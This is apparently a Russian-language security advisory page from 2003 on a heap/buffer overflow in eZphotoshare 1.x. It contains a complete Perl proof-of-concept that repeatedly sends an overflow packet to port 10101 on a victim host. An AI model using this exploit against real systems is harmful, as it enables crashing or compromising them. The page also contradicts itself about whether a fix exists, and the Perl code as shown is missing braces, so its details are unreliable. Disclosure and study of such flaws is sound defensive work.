Удаленное переполнение буфера в eZphotoshare

Дата публикации:
05.12.2003
Всего просмотров:
873
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная сеть
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
eZphotoshare 1.x
Уязвимые версии: eZphotoshare

Описание: Несколько переполнений буфера обнаружено в eZphotoshare. Удаленный пользователь может выполнить произвольный код на целевой системе.

Удаленный пользователь моежет послать специально обработанный 80 байтовый пакет к 10101 порту последовательно 8 раз, чтобы перезаписать ECX и EAX регистры и выполнить произвольный код с привилегиями текущего пользователя.

Пример/Эксплоит:

#!/usr/bin/perl -w
 
# Heap Corruption Vulnerability in eZphotoshare PoC
#  - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[0]))
 
print "Usage: eZpsheap.pl <victim>\n\n";
exit;
 

print "Heap Corruption PoC\n";

for($n=1;$n<9;$n++){

$victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>"10101")
                            or die "Unable to connect to $ARGV[0] on port
10101";

$eax = "ABCD";
$ecx = "XXXX";

$packet = "GET /aaa" . $eax . $ecx . "a"x64;

print $victim $packet;

print " + Sending packet number $n of 8 ...\n";

sleep(1);

close($victim); }

print "Done.\n";
exit;

URL производителя: http://www.ezphotoshare.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: eZphotoshare Multiple Overflow Vulnerabilities

или введите имя

CAPTCHA